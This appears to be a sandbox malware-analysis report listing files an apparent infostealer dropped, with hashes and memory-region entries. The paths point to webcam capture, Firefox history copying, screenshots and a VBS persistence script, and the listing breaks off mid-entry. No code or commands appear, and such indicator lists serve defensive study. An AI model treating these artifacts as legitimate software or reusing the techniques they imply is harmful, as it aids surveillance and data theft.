SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\resources\app.asar

MD5 0acd3ba206b8805ee0c7e5380060f71e
SHA1 e404ab979e2bc39f33996495f1937a2f39dc3cce
SHA256 92a3bff91137b7393321a5a6b681f99dffac6eacb5d6d5d3fc2ee1b1a972ae98
SHA512 b157fcfaf8eda15557a44114a2b12131b0f2fb843a1b0030f6bc6191fbc767b42fd78b23e8e169418b50108b9934a848b636881e79dc37a9765c84beb0cba542

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 0715891e04088a324e4b547e655f9bc2
SHA1 b72762986285a77ee068213b244334bb0ba5d9a6
SHA256 9939ce995a0dff036f2c2bfca7d557468d57a64dcec03429a9a842ac4875836f
SHA512 7a9ccf4ec41fc8f447e7e2b4881d0500f19be615444904ea82a92d8a7b72713438f2d944bfe5d804d085201650253e3690ef37c5e135243d17be44831c1e0b42

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nsvC842.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 0f9715527bc1dceefe581d4ecaecf073
SHA1 ae2a070b081426f0976575fb0c91d4394a75dd87
SHA256 782ab912447b41daa6abf099baea537a8706d29fb4a4e9e5b78295118c3f4991
SHA512 7d229298471c6a2d897f937edc63c7494eeda7c07b4f7b87142e944d9c1cd47faae81915d1ddc6e56fe7bafdc4ff20d8eb1437578a9d958206dab8d31095f3fe

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 d7d263cf757b2fa2c4bbec825cff82ca
SHA1 a5222f4d880b62b97b3ef2b06e8aa710d18755a6
SHA256 02edd060a94b842ccb930e1acd0e7d7876040ea1be128a4754cf3af9bc925a6b
SHA512 2ec6478c22892b4d8c7532cfdd683ae3013321f0c8c98f657e6601464ca25bbbf5192cc00340400018c84e2e6275f24ffe21adfa58ef7888c323ee2687705c3d

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 fe92973d53022fbe52379993847f4f90
SHA1 545289d5b4f7dea807414726c130a37970b512d4
SHA256 9e6e06aa075aee5883ad7de1afded055ec1d9e35838a06609e3a8e0aa0cfd4f3
SHA512 cacd84104afee66b06ceeafe77119ef7aced61b4db7282b89d8151b9608800e80aa65f2d5068b3843a35d14a15507f36f73d06cea22356b451bb704ab82907dd

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\icudtl.dat

MD5 cb1e4b81e6805732e03bf191bd5fbda5
SHA1 6cae23fa345cf0f274cc29e3afe8f5309750c0f1
SHA256 52f42a2edc9be4a5430b0e982b322541b6ee13cd3c8a7a9d197386b4ac287f42
SHA512 c73b327b39cd089f70b31e22f981329fdc74f6e496e389ed9bb1359223d8ac556015addc6066ec909e8f0bb1b354e5e9751e7c0f3b0dbef663fe2b34bedca659

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\resources\app.asar

MD5 02f277066606bd9e9854e9774b2ebf24
SHA1 b60df8e30c596e4bcd38f2194d93827b4c1b2486
SHA256 9459da7739050c5170fbc676de938590118bcf4d25fb9587179286debe9dbd21
SHA512 0ba58bc8e62d3c565d4fbf0362188b55cfe436c74c9f57c82dea612f12a4c9da3f171ae2e780daeb72b61aa1c35ae1c5a551222b1ff4cb6d7c61b5af77ff30e7

C:\Users\Admin\AppData\Local\Temp\b950e49b-0f6e-4daf-b917-e5cb386708b0.tmp.node

MD5 783eca791a4716c8d14a0da9bc90a32e
SHA1 0f376219cb958f9aedcde502569bb4fda8564754
SHA256 3d0dc887c3f15cb1ad94231c37bbd787780c81bb4fc9dc01c06434eb5abbcf7a
SHA512 5d3eab36c7195763861647fc16d34fa7e36135a5daef789bc5f4cc160974540af65522ee2411834c821c4d51a415c3543a51c6996c5d45eb4e63da1697aaa4ff

C:\Users\Admin\AppData\Local\Temp\2f8a3064-54fe-446a-904b-d16580d8d336.tmp.node

MD5 b5b4641f74f4521399a0e1f1b2fdde67
SHA1 456bf03ad545f481f6b6933b3d010b6ff1df3553
SHA256 de406b901acac30dc3ab3dbf89fcd2f6a0eeef54ab205b71f133eb7f762448b9
SHA512 3689910ea9342fe86723827c27301fc6e6735ef926df751fe251e07f3b2c6e0df93f8ccf1d755656a8134fb62d840ea42cdf173e7486fd44bbbed697458aee10

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\resources.pak

MD5 b422bff0e39f00b5f5187452a6e53cca
SHA1 76c220d6c3b0deb9dc37915711c6e884c5df3537
SHA256 1c74f40a23c32278acda27c70528b93d976a47818d1cff57da75000c412fd22b
SHA512 840ba62b005ba5b37faa7a3be1b00dd11dd4f1e9ece4723cfaae0defe089ff5b3d987c61c6661c2667f0b4cb6291faa87ba5efe46e9872c43a8d89f8b2e388e3

memory/4800-580-0x00007FFD67150000-0x00007FFD67151000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 d7a2d0dbaca98f1577c56339adffdd6d
SHA1 f2970f945779b68963c4ee479f6b567f4bcade66
SHA256 da1aa455a42596be513e514b5158dd92d9c1912abc2b2b3a7cca1faa40a703f5
SHA512 003eb5bdbc90b9fd27b20189dd113c5b563c5fbcc2944be7218a29b9bdac27d64f7b4b3f99cf1f10302bde580d456a6ca4b03a42e2ab1d9d758c64ebcfc0efc3

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 22b7313c6f62b6e44e565b623cd9381a
SHA1 9c43594e716e525eefe244e0342fa20f0fe3f98e
SHA256 ef7770640744a25c47bf8df06fd74e51624d374d51e32a9273f169264bfaee8c
SHA512 fc18a0cb0b9cf4f8fbc34bc15ebcbd0f8ab191e4a1b0648c351a80cd0ad3f01952a128ab004421642c4656bad12bf0ac2afc0f200046e92a51cae734bfef4ef2

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 2cb4cb36521f3d874034e9720fd5311d
SHA1 601874874467be00860d74ba825176c88b411412
SHA256 0521aaa0a0d3a3c5d88de0b19503dec5e1c410d760e0b8f659018bd0dd298867
SHA512 37cfd04639c84c2d03848b33756171c3d04bf1bc021f1d72c51ff52f894a00c68313d50819393768f01b3a392e97157f97421e4edb7f997af28eb8798c12f8cc

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libEGL.dll

MD5 e4b9d6eba8cde7866ed985c06ba62a08
SHA1 a2d72d4c9dc294db66103a9090f0ce7c5cbae46e
SHA256 fc3a01ff94ce070426ab66dbd1f7249b0020242883cd02f654104a1414c9946c
SHA512 1bc1fc3b93a6bc47ca62b61f4d9b814fbaaff13fc1b8524b3f8865be97748933fa1047d7bce522bcca777e3d13a856d26b77c2e9682ea731a1ae969adbc44092

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libegl.dll

MD5 7e20094be4705cfea5112ef49f1366b8
SHA1 a391601aa69932e330d3fb2b23da0af6549b013f
SHA256 54bda56cf0d1d1c3882f495ebfa6b68a715687499e2a1f5e2beb150b49085ccd
SHA512 e196c08bd4c2b0ce83cc16d1362527723d9b928086905b9946199c7d569e4db00e7de307618a262f187c811cb509bedbd3bc013dc73391dd14363511c5550d8c

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libGLESv2.dll

MD5 3fef6b047b93b10127b4594506db2023
SHA1 aa6699a677abe18344ab0c869c29c404c875f703
SHA256 1ae6a96613b2e169de5cdba0042f67c19362d098aa0e4f3bcd1d5f0105983ed3
SHA512 3bfa1ae798470fbce0642eac85165507e9391bbdd10c7397d1f0ab4004dcdedc21fde93c9620b02bf30dbed9e8713706f35a650f5b8b2a24efcd62252c436679

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\d3dcompiler_47.dll

MD5 4f230034e0c6ef01d0a7c1a75193c126
SHA1 1ba3620e1f78feb172c6c34aa2ab7c24aae7b025
SHA256 2be1da029257d47cdc21a4b4cce4bb9d376368024625bbfefdefd87d2bc7716b
SHA512 a60a5d560947adf1ae43190d4e28ecb65ae9f67de5d41ded1172507038dba28093bd70471aaf90d062365f414df23ba65e15b1c5d54ed74ade54e3a8d1303ce6

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libglesv2.dll

MD5 854292341aae4fbb33916eb821ab141f
SHA1 47c6e9eb8348eb2f9b10e4ee6bae18a220e239db
SHA256 61968bd18206fdac1964fb967ae25526b7f582d2399177ccd42b4e8f5dab87cc
SHA512 22a6cd28943805c41a4c96f3f313b25f9c0a30d22e279b3fa18fa48cc3ef07410687e49d5e69195e778535a84eccfa30f883cef4b127a9c8a86188b3aa8a9b94

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\D3DCompiler_47.dll

MD5 61513b653ba8f3b100037d9cbf950a79
SHA1 f9b6ebc8b739a5d745867f62f0b0828398686526
SHA256 2cb2151db5efa39a471c791416595c69fcf749606bca528db93272a4b7954d23
SHA512 cf2fee9baf630a9f387f643d3b7da5db05a10233b6bf43293bc9aaa5623e59531bd9490d5f0325a1ee223d0e0704224135eb1fd2d1121ce8fc5771b48c618d3e

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 4643037847cf7b65e967c5b114c23cfc
SHA1 a8db367fec21865791816195b19efb8c658e50cc
SHA256 4c62e1b316f9d04b61e401b823c4c29119d8e7a9db0d5bc153ae610d9cad741a
SHA512 37d5b4ce83d12d64896a6fd5d7b3215454ae851ae2acf439be95af9d0afaf01d6d33261c7b99f759bb188787833dc9ce0e646f171d3971c6fe3997a65541bafb

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 cb748b1d85476a946eb61b0e3ddc6787
SHA1 8285efe802ab68a2a89a8447a2e7a6687d8f3b0f
SHA256 fdbf5919516ea4a11417e54d8d01af088649227958eb6c9f7eb1ce617195ef6e
SHA512 0bf714fd3672a2c9de37a2aee607f1f9c1a3cadd4ef1f73c91ee06f5d2951b4b00484ffdbbbe69b026de4621a9728989de2a84103e1cb083b5ab0d691b67b8f6

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_adwqkeo0.40x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3760-612-0x00000299A57D0000-0x00000299A57F2000-memory.dmp

memory/1072-619-0x0000017033AD0000-0x0000017033AE0000-memory.dmp

memory/1072-620-0x0000017033AD0000-0x0000017033AE0000-memory.dmp

memory/3760-618-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 235a8eb126d835efb2e253459ab8b089
SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

memory/1072-634-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe

MD5 a878695595b68622524796f7b59c0c4a
SHA1 badea36a4c16d4009e64b15288fb5effdd114a4b
SHA256 6e501ccc709fd13ae66b12893f8c1b7823c8d408c8447e8d7b6b57ec0b453b05
SHA512 7af6c66b457ea1679b8cab8481e185ecd8a956d856e00b9cebbd7a538ab67b88d1749c4afe831371b896a9dc67433901f9de04dc8be70a16ae0d861789a8c3ad

memory/4172-652-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

memory/708-669-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

memory/708-670-0x000002629DB40000-0x000002629DB50000-memory.dmp

memory/708-672-0x000002629DB40000-0x000002629DB50000-memory.dmp

memory/708-671-0x000002629DB40000-0x000002629DB50000-memory.dmp

memory/708-686-0x000002629DB40000-0x000002629DB50000-memory.dmp

memory/708-689-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

memory/3760-694-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

memory/1072-713-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

memory/4172-766-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2d323afa70611dc06a77f1cb3c947f4b
SHA1 35fdee81c345aff1cc5fc5fae73ef403097f1ec1
SHA256 c9096dfec009df070090b810b1ae1250b89931a5685315a357c339715780c0ba
SHA512 8ed5890826063889ebc12abc549615b3882898624bcc32df546f887f6089958a0c4f64e20e583bdf97c63b4e3b4b9e45629288034a3623fe991b715bc503cdc2

memory/8840-811-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

memory/6428-813-0x0000020874700000-0x0000020874710000-memory.dmp

memory/8840-812-0x000002CBF8FF0000-0x000002CBF9000000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 561ad4794e22ab68a6811d88e43d6c06
SHA1 3dcd045d3e0fb917c67ec36cfe102e50a9b3c41c
SHA256 250e7bac495dbd6e656b75106b03b7e741c7508097fbd32cf78627061b7ceade
SHA512 00273fa6bf017c674a48e3b9b4757f083540846de66abf8c2b8fc878d38475cf284f3ebefc597600a393ec18c8027a6628e6698ab5a3086fe60e1aa6ef733c96

memory/7524-833-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

memory/7524-844-0x000001410EFF0000-0x000001410F000000-memory.dmp

memory/6428-843-0x0000020874700000-0x0000020874710000-memory.dmp

memory/10520-855-0x00000262A4680000-0x00000262A4690000-memory.dmp

memory/10520-854-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

memory/7524-857-0x000001410EFF0000-0x000001410F000000-memory.dmp

memory/10520-858-0x00000262A4680000-0x00000262A4690000-memory.dmp

memory/7524-859-0x000001410EFF0000-0x000001410F000000-memory.dmp

memory/5284-865-0x000001D666AC0000-0x000001D666AD0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 ac92d49789e2f3319ef07ae98a83f8aa
SHA1 c5803863ae2169aa8d3e6227eb7d8010ed7d1624
SHA256 27619916b445817cae73a24fc88ccbb7d633d8093a33fa8c45c5639e6c2084c9
SHA512 f786d6137536fab28865e28002270e3a9ba93adbc3a34c427330bc5325f66c46943f0a8ced02fcbb59832459ad9b73ed152feda5b2d32ea392e62925f2dc6e7f

memory/8840-860-0x000002CBF8FF0000-0x000002CBF9000000-memory.dmp

memory/6428-856-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

memory/5284-867-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1ZOrSzH8tM7c_temp.ps1

MD5 d8b309a0dcdba84c43c15e93c9d398a3
SHA1 2ad3e5cf2906454553cc1de38d1c25fe157d4ea5
SHA256 b54803df44a0ed807143c0e035e5adee8f47285e0d0b4eb327b27ef515bd02de
SHA512 f37a4c4ab71bfbcaf99b2cb6a93d3553262c432977f70b4a52f4b42bb066c5b7ea35b7cfcbc2b1d735c60cc650ee035468f5db887367c4fab25e7cfdc4fdef1e

memory/7240-869-0x000001482E020000-0x000001482E030000-memory.dmp

memory/7240-870-0x000001482E020000-0x000001482E030000-memory.dmp

memory/7240-871-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

memory/5284-890-0x000001D666AC0000-0x000001D666AD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8ba7ecbbdc1af2495ba9632854d63eba
SHA1 403e1c4f6b9acec06e407b784020ee19bdd800c6
SHA256 0e0ef4a7e7f29527dfd9769ebddbdfabfd776a9249ac39d37f53a6836df24f5f
SHA512 ac05e26ea203f220eff0dd4dc22bdacd0ac20274cafaac22f0bd3150cac92c09c40659e6f1ceac2735aef1e57a4a7abfadad224e3c47fe3533939b001861725f

memory/5284-896-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

memory/9700-902-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 37086bed15cbd08ea099fbc181b6a50b
SHA1 d03cab9fc0c8597cac48bb60004da0edcedacd1c
SHA256 cf9811de3f5f8de672f26c02c6519feac651663c7cc389cc36d40ad177176f71
SHA512 65273c6e852426bea8e7b7ebf4976a0b634ec17e3d44a7fb9033e0f5455fdfd9c26d01aa33571b3206435d3671ace1efd7c33e7f88477e6791007ed00c2620ab

memory/9700-904-0x000001B6ED060000-0x000001B6ED070000-memory.dmp

memory/6428-905-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

memory/7524-903-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f2b472efb7b1fd1d1a92669e46a549ad
SHA1 9733b1da3bf6c9d7822a6118ea66d39e29be440f
SHA256 031395a4c2c8989bb4d48ec9ddc545b788247c77d482fb86ff668ba2ffe8913a
SHA512 72b0a35d142537a1f7277194f4d5863b3c8db285c2e9bee6cf2ed1e554dcdfdbc8f9aee3c869b58a85dd7cf3e6c68c96363ea2bd4268c3001da47e083f443344

memory/9700-916-0x000001B6ED060000-0x000001B6ED070000-memory.dmp

memory/10520-921-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c2a26a05ae505fbff9a55a60fb799572
SHA1 c4d95c942bde11ee5ff563d521ef09a960ad5018
SHA256 12b045b5bfe391b1466e68e940d403d453607bbbf681af9545b7b1a7050f5c61
SHA512 1054a11a5357251a0177ac45efd4344c8204d35dd709fbcf6d91459d0c62e191b46f0006b75cdf60971391e5157051c7c8c056012df25e27bc69a1570ec1586e

memory/7240-922-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5ea61f668ad9fe64ff27dec34fe6d2f
SHA1 5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b
SHA256 8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466
SHA512 cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

memory/9700-925-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\stdidscq.default-release\places.sqlite_tmp

MD5 e3a67ee777efc15119051574c13ac444
SHA1 73122087f6348775cc5a5de113ad8265691f893e
SHA256 a6d30d896a7b9a5cca57be58badd3ad22a80992e0402fcc3f26e795451234c26
SHA512 d62f81fff031c077f34f05b96c0cbd13ce23d2cfe1a10e8e24b1a1c4f2c88017574e395e901e35273e305008c5774916e885caf24b9efc0d4ca8b97c76bbd87c

C:\Users\Admin\AppData\Local\Temp\Hsv6vNcdFqVEIvCRQzk8\System\IXMQMCCR - 2023-12-20_084951.png

MD5 cf07e340082a3d83efa9916cff4c8cd8
SHA1 329e838e5019be7da788560a15c65bd703355826
SHA256 f6b8667df3390bcb37eb558eed2019c9d13cb7db8fd34d4e02ed472cc542acde
SHA512 fb7c80e59285cc0a960bbdc3aa001e7883ea3a6699e5e8f5d52e64a0d433b92d55d3158d28e474c77aa0c56029fe25f2afc423a169ac91baf6af9eb57c64b28f

memory/8840-984-0x00007FFD46170000-0x00007FFD46C31000-memory.dmp

memory/8516-1001-0x0000013180100000-0x0000013180110000-memory.dmp

memory/8516-1002-0x0000013180100000-0x0000013180110000-memory.dmp

memory/8516-999-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_YoJEgp.vbs

MD5 e1e6602ad0325baf98e0d48968bb7a80
SHA1 c9a2b91d84731f01bf3ffe77d25ecadee6126591
SHA256 024ff0748614e7cb6c8c1ecd5ce9bc7bc2256793ad88324a79d06fffac73244e
SHA512 fc4dd059fc27875c3dc87c22b37b93fe686bb0951fbb3f6646c46100e116ad5a42dd7a87467b9fb8ea4d12357edc4d386a787fa4b2023163a26b272027dbae85

memory/8516-1005-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3baf63c8c965434fefdb87db8582e80a
SHA1 aabb4631eb867be8896a9525d4c92ec3a701f46c
SHA256 ebb27a321f5ceb9c3807b8407609a6bb1b560e2ce8dd854f96932528907a9190
SHA512 c6ddcb37ba68e471339b715da22b1982e5d53624ee3ee27c289af6167f45f35045bd196cd6224602ae1097d921444d76e197748b768c412a07044a3cbee92caf

memory/4784-1051-0x00000212C1D70000-0x00000212C1D80000-memory.dmp

memory/4784-1045-0x00007FFD464F0000-0x00007FFD46FB1000-memory.dmp

C:\Users\Admin\AppData\Roaming\salutVhSDQ.ps1

MD5 28e4eda7451c625bbe806b745753f729
SHA1 d29e9b2c2ac5b10188cbae92cffba6827728543d
SHA256 da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba
